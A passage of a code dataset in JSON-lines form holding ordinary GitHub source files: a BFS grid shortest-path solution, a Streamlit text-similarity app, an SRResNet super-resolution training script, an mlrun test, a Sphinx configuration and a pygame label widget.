function","repo_name":"asiamak/Project-3-2","sub_path":"wordfind.py","file_name":"wordfind.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31134147358","text":"# bfs\n\nfrom collections import deque\n\n# up, down, left, right\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n\ndef bfs(r, c, maps):\n    queue = deque([])\n    queue.append([r, c])\n    visited = [[0] * len(maps[0]) for i in range(len(maps))]\n    visited[r][c] = 1\n\n    # pop from the queue\n    while queue:\n        x, y = queue.popleft()\n\n        # reached the destination?\n        if x == (len(maps)-1) and y == (len(maps[0])-1):\n            return visited[len(maps)-1][len(maps[0])-1]\n\n        # visit every reachable neighbor\n        for k in range(4):\n            nx = x + dx[k]\n            ny = y + dy[k]\n\n            # is this cell inside the map and walkable?\n            if 0 <= nx < len(maps) and 0 <= ny < len(maps[0]):\n                if maps[nx][ny]==1:\n                    if visited[nx][ny] == 0:\n                        queue.append([nx, ny])  # push to the queue\n                        visited[nx][ny] = 
visited[x][y]+1  # mark visited with distance\n\n    return -1\n\n\ndef solution(maps):\n    answer = 0\n\n    answer=bfs(0, 0, maps)\n\n    return answer\n\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,1],[0,0,0,0,1]]))","repo_name":"SangRakee/AlgoriGym","sub_path":"Programmers/게임 맵 최단거리.py","file_name":"게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40634487652","text":"\nimport numpy as np\nimport pandas as pd\nimport re\nimport string\nimport nltk \nfrom nltk.stem import WordNetLemmatizer \nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.pipeline import Pipeline\nimport spacy\nfrom collections import Counter\nimport pickle\nimport streamlit as st\nnlp = spacy.load('en_core_web_sm')\n\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('omw-1.4')\nnltk.download('punkt')\n\n\n\nst.header('SEMANTIC TEXTUAL SIMILARITY')\ntext1 = pickle.load(open('text1.pkl','rb'))\ntext2 = pickle.load(open('text2.pkl','rb'))\n\nselected_text1 = st.selectbox(\n    \"select a text from the dropdown\",\n    text1)\n\nselected_text2 = st.selectbox(\n    \"select a text from the dropdown\",\n    text2)\n\ncopydata = pd.DataFrame([[selected_text1,selected_text2]],columns = [\"text1\",\"text2\"])\n\ndef remove_punc(copydata):\n    pattern = r'[' + string.punctuation + ']'\n    copydata['text1']=copydata['text1'].map(lambda m:re.sub(pattern,\" \",m))\n    copydata['text2']=copydata['text2'].map(lambda m:re.sub(pattern,\" \",m))\n    return copydata\n\n\ndef lower(copydata):\n    copydata['text1']=copydata['text1'].map(lambda m:m.lower())\n    copydata['text2']=copydata['text2'].map(lambda m:m.lower())\n    return copydata\n\n\ndef tokenization(text):\n    tokens = re.split(' ',text)\n    return tokens\n\ndef token(copydata):\n    copydata['text1']= copydata['text1'].apply(lambda x: tokenization(x))\n    copydata['text2']= copydata['text2'].apply(lambda x: tokenization(x))\n    return copydata\n\n\nsw=nltk.corpus.stopwords.words('english')\n\ndef remove_SW(copydata):\n    copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if item not in sw])\n    copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if item not in sw])\n    return copydata\n\n\ndef remove_digits(copydata):\n    copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if not item.isdigit()])\n    copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if not item.isdigit()])\n    return copydata\n\n\nlemmatizer = WordNetLemmatizer()\n\ndef lemmatize(copydata):\n    copydata['text1']=copydata['text1'].apply(lambda x: [lemmatizer.lemmatize(item) for item in x])\n    copydata['text2']=copydata['text2'].apply(lambda x: [lemmatizer.lemmatize(item) for item in x])\n    return copydata\n\n\ndef remove_empty_tokens(copydata):\n    copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if item !=''])\n    copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if item !=''])\n    return copydata\n\n\ndef remove_single_letters(copydata):\n    copydata['text1']=copydata['text1'].apply(lambda x: [item for item in x if len(item) > 1])\n    copydata['text2']=copydata['text2'].apply(lambda x: [item for item in x if len(item) > 1])\n    return copydata\n\n\ndef detoken(copydata):\n    copydata['text1']= copydata['text1'].apply(lambda x: TreebankWordDetokenizer().detokenize(x))\n    copydata['text2']= 
copydata['text2'].apply(lambda x: TreebankWordDetokenizer().detokenize(x))\n    return copydata\n\ndef replace_spaces(x,space,second):\n    result = x.replace(space, second)\n    return result\ndef remove_space(copydata):\n    copydata['text1']= copydata['text1'].apply(lambda x: replace_spaces(x,'   ',' '))\n    copydata['text2']= copydata['text2'].apply(lambda x: replace_spaces(x,'   ',' '))\n    return copydata\n\ndef count_vcr():\n    for i in range(len(copydata)):\n        doc1=copydata['text1'][i]\n        doc2=copydata['text2'][i]\n        docs=(doc1,doc2)\n        matrix = CountVectorizer().fit_transform(docs)\n        cosine_sim = cosine_similarity(matrix[0], matrix[1])\n        similarity.append(cosine_sim)\n    return similarity\n\ncopydata=copydata.pipe(remove_punc).pipe(token).pipe(remove_SW).pipe(remove_digits).pipe(lemmatize).pipe(remove_empty_tokens).pipe(remove_single_letters)\n\nsimilarity=[]\ndef get_similarity():\n    bow_converter = CountVectorizer()\n    copydata.pipe(detoken).pipe(remove_space)\n\n    similarity=count_vcr()\n    data_cvr=copydata.copy()\n    data_cvr['Similarity']=similarity\n    return data_cvr\n\n\nif st.button('Show Similarity'):\n    data_cvr = get_similarity()\n    st.text(data_cvr.iloc[0,0])\n    st.text(data_cvr.iloc[0,1])\n    st.text(data_cvr.iloc[0,2])\n","repo_name":"Nickghase/Semantic-Textual-Similarity","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71175052648","text":"import os\ntry:\n    import nni\n    from nni.utils import merge_parameter\nexcept ImportError:\n    pass\nimport numpy\nimport math\nimport h5py\nimport argparse\nimport time\nimport datetime\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping, Callback\nimport mlflow.pytorch\nmlflow.set_tracking_uri(\"sqlite:///mlruns.db\")\n\nclass SRDataset(Dataset):\n    def __init__(self, data_path, args, transform=None):\n        '''\n        data: image\n        transform: optional transforms applied to the image\n        '''\n        start_time = time.time()\n        print(f'read images {data_path} ...')\n        # read data\n        h5_file = h5py.File(data_path, 'r')\n        if args.debug:\n            self.X = h5_file['X'][:10]\n            self.y = h5_file['y'][:10]\n        else:\n            self.X = h5_file['X'][:]\n            self.y = h5_file['y'][:]\n        self.transform = transform\n        print(f'loading images took {time.time() - start_time:.4f}sec')\n\n    def __len__(self):\n        return len(self.X)\n\n    def __getitem__(self, idx):\n        x = self.X[idx]\n        y = self.y[idx]\n        if self.transform:\n            x = self.transform(x)\n            y = self.transform(y)\n\n        return x, y\n\n\nclass AddGaussianNoise(object):\n    def __init__(self, mean=0., std=1.):\n        self.std = std\n        self.mean = mean\n    \n    def __call__(self, tensor):\n        return tensor + torch.randn(tensor.size()) * self.std + self.mean\n    \n    def __repr__(self):\n        return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\nclass SRDataModule(pl.LightningDataModule):\n    def __init__(self, args):\n        super().__init__()\n        self.train_transform = transforms.Compose([#transforms.RandomHorizontalFlip(),\n                                                   #transforms.RandomVerticalFlip(),\n                                                   #transforms.RandomInvert(),\n                                                   #transforms.ColorJitter(),\n                                                   #transforms.RandomGrayscale(),\n                                                   transforms.ToTensor(),\n                                                   #transforms.RandomRotation(90),\n                                                   #transforms.RandomRotation(180),\n                                                   #transforms.RandomRotation(270),\n                                                   #AddGaussianNoise(0.1, 0.08),\n                                                   
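# --- Editor's standalone sketch (example texts are mine, not from either file):
# count_vcr above vectorizes each text pair with CountVectorizer and scores it
# with cosine similarity; the whole round trip fits in a few lines.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity

docs = ("broadband challenges tv viewing", "broadband tv viewing challenges rise")
matrix = CountVectorizer().fit_transform(docs)
score = cosine_similarity(matrix[0], matrix[1])[0][0]
print(round(score, 3))  # ~0.894 -- only word counts matter, order is ignored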
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])\n self.val_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))])\n\n def setup(self, stage):\n if stage == 'fit' or stage is None:\n sr_train = os.path.join(args.data_dir, 'train.h5')\n sr_valid = os.path.join(args.data_dir, 'valid.h5')\n\n self.train_dataset = SRDataset(sr_train, args, transform=self.train_transform)\n self.valid_dataset = SRDataset(sr_valid, args, transform=self.val_transform)\n\n def train_dataloader(self):\n train_dataloader = DataLoader(self.train_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True)\n print(f'train_dataloader: {next(iter(train_dataloader))[0].shape}')\n print(f'train_dataloader: {next(iter(train_dataloader))[1].shape}')\n return train_dataloader\n\n def val_dataloader(self):\n val_dataloader = DataLoader(self.valid_dataset, batch_size=args.batch_size)\n print(f'val_dataloader: {next(iter(val_dataloader))[0].shape}')\n print(f'val_dataloader: {next(iter(val_dataloader))[1].shape}')\n return val_dataloader\n\nclass ConvolutionalBlock(pl.LightningModule):\n '''\n Convolutional block: Convolution, BatchNorm, Activation\n credits: https://github.com/sgrvinod/a-PyTorch-Tutorial-to-Super-Resolution/blob/master/models.py\n '''\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, batch_norm=False, activation=None):\n '''\n :param in_channels: number of input channels\n :param out_channels: number of output channels\n :param kernel_size: kernel size\n :param stride: stride\n :param batch_norm: include a BN layer?\n :param activation: Type of activation; None if none\n '''\n super(ConvolutionalBlock, self).__init__()\n\n if activation is not None:\n activation = activation.lower()\n assert activation in {'prelu', 'leakyrelu', 'tanh'}\n\n # container, that will hold the layers in this convolutional block\n layers = list()\n # convolutional layer\n layers.append(\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, \n stride=stride, padding=kernel_size // 2)\n )\n # batch normalization, if wanted\n if batch_norm is True:\n layers.append(nn.BatchNorm2d(num_features=out_channels))\n\n # activation layer, if wanted\n if activation == 'prelu':\n layers.append(nn.PReLU())\n elif activation == 'leakyrelu':\n layers.append(nn.LeakyReLU(0.2))\n elif activation == 'tanh':\n layers.append(nn.Tanh())\n\n # put together the convolutional block as a sequence of the layers\n self.conv_block = nn.Sequential(*layers)\n\n def forward(self, input):\n '''\n Forward propagation\n\n :param input: input images, a tensor of size (N, in_channels, w, h)\n :return: output images, a tensor of size (N, out_channels, w, h)\n '''\n output = self.conv_block(input) #(N, out_channels, w, h)\n return output\n\nclass SubPixelConvolutionalBlock(pl.LightningModule):\n \"\"\"\n A subpixel convolutional block, comprising convolutional, pixel-shuffle, and PReLU activation layers.\n \"\"\"\n def __init__(self, args, scaling_factor=2):#kernel_size=3, n_channels=64, scaling_factor=2):\n \"\"\"\n :param kernel_size: kernel size of the convolution\n :param n_channels: number of input and output channels\n :param scaling_factor: factor to scale input images by (along both dimensions)\n \"\"\"\n super(SubPixelConvolutionalBlock, self).__init__()\n # convolutional layer that increases the number of channels by scaling factor^2, followed by pixel shuffle and PReLU\n self.conv = 
nn.Conv2d(in_channels=args.n_channels, out_channels=args.n_channels * (scaling_factor ** 2),\n kernel_size=args.small_kernel_size, padding=args.small_kernel_size // 2)\n # These additional channels are shuffled to form additional pixels, upscaling each dimension by the scaling factor\n self.pixel_shuffle = nn.PixelShuffle(upscale_factor=scaling_factor)\n self.prelu = nn.PReLU()\n\n def forward(self, input_):\n \"\"\"\n Forward propagation.\n :param input: input images, a tensor of size (N, n_channels, w, h)\n :return: scaled output images, a tensor of size (N, n_channels, w * scaling factor, h * scaling factor)\n \"\"\"\n output = self.conv(input_) # (N, n_channels * scaling factor^2, w, h)\n output = self.pixel_shuffle(output) # (N, n_channels, w * scaling factor, h * scaling factor)\n output = self.prelu(output) # (N, n_channels, w * scaling factor, h * scaling factor)\n\n return output\n\n\nclass ResidualBlock(pl.LightningModule):\n \"\"\"\n A residual block, comprising two convolutional blocks with a residual connection across them.\n \"\"\"\n def __init__(self, args):\n \"\"\"\n :param kernel_size: kernel size\n :param n_channels: number of input and output channels (same because the input must be added to the output)\n \"\"\"\n super(ResidualBlock, self).__init__()\n\n # first convolutional block\n self.conv_block1 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=args.n_channels, \n kernel_size=args.small_kernel_size, batch_norm=True, activation='PReLu')\n\n # second convolutional block\n self.conv_block2 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=args.n_channels,\n kernel_size=args.small_kernel_size, batch_norm=True, activation=None)\n\n def forward(self, input_):\n \"\"\"\n Forward propagation\n :param input: input images, a tensor of size (N, n_channels, w, h)\n :return: output images, a tensor of size (N, n_channels, w, h)\n \"\"\"\n residual = input_ # (N, n_channels, w, h)\n output = self.conv_block1(input_) # (N, n_channels, w, h)\n output = self.conv_block2(output) # (N, n_channels, w, h)\n output = output + residual # (N, n_channels, w, h)\n\n return output\n \n\nclass SRResNet(pl.LightningModule):\n '''\n The SRResNet, as defined in the paper.\n credits: https://github.com/sgrvinod/a-PyTorch-Tutorial-to-Super-Resolution/blob/master/models.py\n '''\n def __init__(self, args):\n \"\"\"\n :param large_kernel_size: kernel size of the first and last convolutions which transform the inputs and outputs\n :param small_kernel_size: kernel size of all convolutions in-between, i.e. those in the residual and subpixel convolutional blocks\n :param n_channels: number of channels in-between, i.e. 
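# --- Editor's shape check (not from the repo): nn.PixelShuffle(r) trades
# channels for resolution, (N, C*r^2, H, W) -> (N, C, r*H, r*W), which is why
# the conv above first widens the channel count by scaling_factor**2.
import torch
import torch.nn as nn

x = torch.randn(1, 64 * 4, 24, 24)  # 64 channels widened by r^2 = 4
y = nn.PixelShuffle(2)(x)
assert y.shape == (1, 64, 48, 48)  # channels back to 64, spatial size doubled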
the input and output channels for the residual and subpixel convolutional blocks\n        :param n_blocks: number of residual blocks\n        :param scaling_factor: factor to scale input images by (along both dimensions) in the subpixel convolutional block\n        \"\"\"\n        super(SRResNet, self).__init__()\n        #self.save_hyperparameters(args)\n\n        # Scaling factor must be 2, 4 or 8\n        scaling_factor = int(args.scaling_factor)\n        assert scaling_factor in {2, 4, 8}, \"The scaling factor must be 2, 4, or 8!\"\n\n        # First convolutional block\n        self.conv_block1 = ConvolutionalBlock(in_channels=3, out_channels=args.n_channels, \n                                              kernel_size=args.large_kernel_size,\n                                              batch_norm=False, activation='PReLu')\n\n        # Sequence of residual blocks\n        self.residual_blocks = nn.Sequential(\n            *[ResidualBlock(args) for i in range(args.n_blocks)]\n        )\n\n        # Another convolutional block\n        self.conv_block2 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=args.n_channels,\n                                              kernel_size=args.small_kernel_size, batch_norm=True, activation=None)\n\n        # Upscaling: by sub-pixel convolution, each such block upscaling by a factor of 2\n        n_subpixel_convolutional_blocks = int(math.log2(args.scaling_factor))\n        print(f'times subpixel: {n_subpixel_convolutional_blocks}')\n        self.subpixel_convolutional_blocks = nn.Sequential(\n            *[SubPixelConvolutionalBlock(args, scaling_factor=2) for i in range(n_subpixel_convolutional_blocks)]\n        )\n\n        # Last convolutional block\n        self.conv_block3 = ConvolutionalBlock(in_channels=args.n_channels, out_channels=3,\n                                              kernel_size=args.large_kernel_size, batch_norm=False, activation='Tanh')\n\n    def forward(self, lr_imgs):\n        \"\"\"\n        Forward propagation\n\n        :param lr_imgs: low-resolution input images, a tensor of size (N, 3, w, h)\n        :return: super-resolution output images, a tensor of size (N, 3, w * scaling factor, h * scaling factor)\n        \"\"\"\n        output = self.conv_block1(lr_imgs) # (N, n_channels, w, h)\n        residual = output # (N, n_channels, w, h)\n        output = self.residual_blocks(output) # (N, n_channels, w, h)\n        output = self.conv_block2(output) # (N, n_channels, w, h)\n        output = output + residual\n        output = self.subpixel_convolutional_blocks(output) # (N, n_channels, w * scaling factor, h * scaling factor)\n        sr_imgs = self.conv_block3(output) # (N, 3, w * scaling factor, h * scaling factor)\n        return sr_imgs\n\n    def configure_optimizers(self):\n        optimizer = torch.optim.Adam(self.parameters(), lr=args.learning_rate)\n        return optimizer\n\n    def mse_loss(self, y_hat, y):\n        criterion = nn.MSELoss()\n        loss = criterion(y_hat, y)\n        return loss\n\n    def training_step(self, train_batch, batch_idx):\n        x, y = train_batch\n        y_hat = self.forward(x)\n        loss = self.mse_loss(y_hat, y)\n        self.log('train_loss', loss)\n        return loss\n\n    def validation_step(self, val_batch, batch_idx):\n        x, y = val_batch\n        y_hat = self.forward(x)\n        loss = self.mse_loss(y_hat, y)\n        self.log('val_loss', loss)\n\n    def predict_step(self, val_batch, batch_idx):\n        x, y = val_batch\n        y_pred = self.forward(x)\n        return y_pred\n    \nclass SRCallbacks(Callback):\n    def __init__(self, args):\n        self.args = args\n\n    def on_validation_epoch_end(self, trainer, pl_module):\n        metrics = trainer.callback_metrics\n        print('\\nValidation epoch end:')\n        for key, item in metrics.items():\n            print(f'{key}: {item:.4}')\n\n        #if self.args.nni:\n        #    nni.report_intermediate_result(float(metrics['val_loss']))\n\n    def on_train_end(self, trainer, pl_module):\n        metrics = trainer.callback_metrics\n        print('\\nFinal validation loss:')\n        for key, item in metrics.items():\n            print(f'{key}: {item:.4}')\n        #if self.args.nni:\n        #    nni.report_final_result(float(metrics['val_loss']))\n
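\n# The MSE objective above maps directly onto PSNR, the usual reporting metric for super-resolution. A minimal sketch (assumes pixel values rescaled to [0, 1], so MAX_I = 1.0; not part of the original script):\n#\n# def psnr_from_mse(mse, max_i=1.0):\n#     return 10 * math.log10(max_i ** 2 / mse)   # e.g. mse=0.01 -> 20.0 dB\n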
\ndef add_nni_params(args):\n    args_nni = nni.get_next_parameter()\n    assert all([key in args for key in args_nni.keys()]), 'need only valid parameters'\n    args_dict = vars(args)\n    # cast params that should be int to int if needed (nni may offer them as float)\n    args_nni_casted = {key:(int(value) if type(args_dict[key]) is int else value)\n                       for key, value in args_nni.items()}\n    args_dict.update(args_nni_casted)\n\n    # adjust paths of model and prediction outputs so they get saved together with the other outputs\n    nni_output_dir = os.path.expandvars('$NNI_OUTPUT_DIR')\n    for param in ['save_model_path', 'output_path']:\n        nni_path = os.path.join(nni_output_dir, os.path.basename(args_dict[param]))\n        args_dict[param] = nni_path\n    return args\n\ndef make_predictions(model, dataloader, args):\n    print('make predictions...')\n    # undo normalization\n    start_time = time.time()\n    mean = torch.tensor([0.485, 0.456, 0.406])\n    std = torch.tensor([0.229, 0.224, 0.225])\n    mean_rev = -(mean/std)\n    std_rev = 1/std\n    un_transform = transforms.Compose([transforms.Normalize(mean_rev, std_rev)])\n    y_pred = []\n    for batch in dataloader:\n        X, y = batch\n        pred = model(X)\n        for i in range(X.size()[0]): # iterate over the batch dimension\n            pred[i] = un_transform(pred[i])\n        y_pred.append(pred)\n    y_pred = torch.concat(y_pred, axis=0).detach()\n    if args.accelerator=='gpu':\n        y_pred = y_pred.cpu().numpy()\n\n    print('predictions finished.')\n    print(f'making predictions took: {time.time()-start_time:.3f}s')\n    print('save predictions ...')\n    h5_file = h5py.File(args.output_path, 'w')\n    chunk_size = y_pred.shape[0]\n    dset = h5_file.create_dataset('y_pred',\n                              shape=y_pred.shape,\n                              chunks=(chunk_size,) + y_pred.shape[1:],\n                              fletcher32=True,\n                              dtype='float32')\n    dset[:] = y_pred\n    h5_file.attrs['timestamp'] = str(datetime.datetime.now())\n    h5_file.close()\n    print(f'saved high resolution images to {args.output_path}')\n\n\nif __name__ == '__main__':\n    print(torch.cuda.device_count())\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--debug', action='store_true', default=False)\n    parser.add_argument('--data-dir', type=str, default='data')\n    parser.add_argument('--output-path', type=str, default='data/best_hr_predictions.h5')\n    parser.add_argument('--save-model-path', type=str, default='saved_models')\n    parser.add_argument('--batch-size', type=int, default=16)\n    parser.add_argument('--learning-rate', type=float, default=1e-3)\n    parser.add_argument('--scaling-factor', type=int, default=4) # the scaling factor for the generator; the input LR images will be downsampled from the target HR images by this factor\n    parser.add_argument('--n-channels', type=int, default=64) # number of channels in-between, i.e. the input and output channels for the residual and subpixel convolutional blocks\n    parser.add_argument('--large-kernel-size', type=int, default=9) # kernel size of the first and last convolutions which transform the inputs and outputs\n    parser.add_argument('--small-kernel-size', type=int, default=3) # kernel size of all convolutions in-between, i.e. 
those in the residual and subpixel convolutional blocks \n parser.add_argument('--n-blocks', type=int, default=16) # number of residual blocks\n parser.add_argument('--n-epochs', type=int, default=200)\n parser.add_argument('--nni', action='store_true', default=False)\n \n\n #mlflow.pytorch.autolog()\n parser = pl.Trainer.add_argparse_args(parser)\n #parser = SRResNet.add_model_specific_args(parser)\n args = parser.parse_args()\n\n if args.nni:\n args = add_nni_params(args)\n\n for key, value in vars(args).items():\n print(f'{key}: {value}')\n print()\n\n # callbacks\n checkpoint_callback = ModelCheckpoint(monitor=\"val_loss\", dirpath=args.save_model_path, filename='best_model-{epoch}-{val_loss:.2f}')\n early_stop_callback = EarlyStopping(monitor=\"val_loss\", min_delta=0.00, patience=10, verbose=False, mode=\"min\")\n\n model = SRResNet(args)\n data_module = SRDataModule(args)\n data_module.setup(stage='fit')\n train_loader = data_module.train_dataloader()\n valid_loader = data_module.val_dataloader()\n\n tuner_params = nni.get_next_parameter()\n params = vars(merge_parameter(args, tuner_params))\n # get parameters form tuner\n print(nni.get_trial_id())\n\n \n trainer = pl.Trainer.from_argparse_args(args, \n callbacks=[checkpoint_callback, SRCallbacks(args)], \n max_epochs=args.n_epochs)\n \n mlflow.set_experiment(\"hyperparam-search\")\n with mlflow.start_run():\n mlflow.log_params(params)\n mlflow.pytorch.autolog()\n mlflow.set_tag(key=\"NNI experiment\", value=nni.get_experiment_id())\n trainer.fit(model, train_loader, valid_loader)\n\n # make predictions on validation set\n valid_model = SRResNet.load_from_checkpoint(checkpoint_callback.best_model_path, args=args).eval()\n if args.accelerator=='gpu':\n valid_model = valid_model.cuda()\n make_predictions(valid_model, valid_loader, args)\n\n \n","repo_name":"froukje/super-resolution","sub_path":"srresnet.py","file_name":"srresnet.py","file_ext":"py","file_size_in_byte":19114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23573412777","text":"import pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.orm import Session\n\nimport mlrun.errors\nfrom mlrun.runtimes.base import BaseRuntime\nfrom tests.api.runtimes.base import TestRuntimeBase\n\n\nclass TestBaseRunTime(TestRuntimeBase):\n def custom_setup_after_fixtures(self):\n self._mock_create_namespaced_pod()\n\n @pytest.mark.parametrize(\n \"inputs\", [{\"input1\": 123}, {\"input1\": None}, {\"input1\": None, \"input2\": 2}]\n )\n def test_run_with_invalid_inputs(self, db: Session, client: TestClient, inputs):\n runtime = BaseRuntime()\n with pytest.raises(mlrun.errors.MLRunInvalidArgumentTypeError):\n self._execute_run(runtime, inputs=inputs)\n\n def test_run_with_valid_inputs(self, db: Session, client: TestClient):\n inputs = {\"input1\": \"mlrun\"}\n runtime = BaseRuntime()\n self._execute_run(runtime, inputs=inputs)\n","repo_name":"jasonnIguazio/ghpages-mlrun","sub_path":"tests/api/runtimes/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4621956591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import date\nimport recommonmark\nfrom recommonmark.transform import AutoStructify\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#\n# 
needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = ['sphinx.ext.mathjax',\n 'sphinx_copybutton']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\nsource_parsers = {\n '.md': 'recommonmark.parser.CommonMarkParser',\n}\n\n\ndef setup(app):\n app.add_config_value('recommonmark_config', {\n 'enable_eval_rst': True,\n 'enable_auto_doc_ref': True,\n }, True)\n app.add_transform(AutoStructify)\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\nsource_suffix = ['.rst', '.md']\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# Set the default role so we can use `foo` instead of ``foo``\ndefault_role = 'literal'\n\n# General information about the project.\nproject = u'ThebeLab'\ncopyright = u'%i, Min RK' % date.today().year\nauthor = u'Min RK'\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = None\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This patterns also effect to html_static_path and html_extra_path\nexclude_patterns = [\"_build\"]\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nimport alabaster_jupyterhub\n\nhtml_theme = 'alabaster_jupyterhub'\nhtml_theme_path = [alabaster_jupyterhub.get_html_theme_path()]\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#\nhtml_theme_options = {\n 'show_related': True,\n 'description': 'Turn static HTML pages into live documents',\n 'github_user': 'minrk',\n 'github_repo': 'thebelab',\n 'github_banner': False,\n 'github_button': False,\n 'show_powered_by': False,\n 'extra_nav_links': {\n 'GitHub Repo': 'http://github.com/minrk/thebelab',\n 'Issue Tracker': 'http://github.com/minrk/thebelab/issues',\n },\n}\n\nhtml_sidebars = {\n '**': [\n 'about.html',\n 'searchbox.html',\n 'navigation.html',\n 'relations.html',\n 'sourcelink.html',\n ],\n}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\", \"../examples\"]\n\n# -- Options for HTMLHelp output ------------------------------------------\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'ThebeLabDoc'\n\n\n# -- Options for LaTeX output ---------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #\n # 'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #\n # 'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #\n # 'preamble': '',\n\n # Latex figure (float) alignment\n #\n # 'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. 
List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, 'ThebeLabDoc.tex', 'ThebeLab',\n 'Chris Holdgraf', 'manual'),\n]\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n (master_doc, 'ThebeLab', 'ThebeLab',\n [author], 1)\n]\n\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (master_doc, 'ThebeLabDoc', 'ThebeLab',\n author, 'ThebeLabDoc', 'One line description of project.',\n 'Miscellaneous'),\n]\n\n\n# -- Options for Epub output ----------------------------------------------\n\n# Bibliographic Dublin Core info.\nepub_title = project\nepub_author = author\nepub_publisher = author\nepub_copyright = copyright\n\n# The unique identifier of the text. This can be a ISBN number\n# or the project homepage.\n#\n# epub_identifier = ''\n\n# A unique identification for the text.\n#\n# epub_uid = ''\n\n# A list of files that should not be packed into the epub file.\nepub_exclude_files = ['search.html']\n\n# -- Linkcheck options ------------------\nlinkcheck_anchors_ignore = [\"/#!\"]\n","repo_name":"sergeyepimakhov/thebelab","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"5835380660","text":"from Src.Gui.GuiElement import GuiElement\nimport pygame\n\nclass Label(GuiElement):\n\n def __init__(self, position: tuple, size: tuple, text: str, padding: tuple, color: tuple, hoverColor: tuple, fontSize: int, background: tuple, hoverBackground: tuple, center: bool=False):\n super().__init__(position, size)\n self.text = text\n self.padding = padding\n self.color = [color, hoverColor]\n self.fontSize = fontSize\n self.background = [background, hoverBackground]\n self.center = center\n \n def renderFont(self):\n font = pygame.font.SysFont(\"Arial\", self.fontSize)\n render = font.render(self.text, True, self.getColor(), None)\n return render\n\n def getTextPosition(self, fontRender):\n if self.center:\n textX, textY = fontRender.get_size()\n x = self.position[0] + (self.size[0] / 2) - (textX / 2)\n y = self.position[1] + (self.size[1] / 2) - (textY / 2)\n return (x, y)\n x = self.position[0] + self.padding[0]\n y = self.position[1] + self.padding[1]\n return (x, y)\n\n def handleHover(self):\n mousePosition = pygame.mouse.get_pos()\n return (\n self.position[0] < mousePosition[0] + 1 and\n self.position[0] + self.size[0] > mousePosition[0] 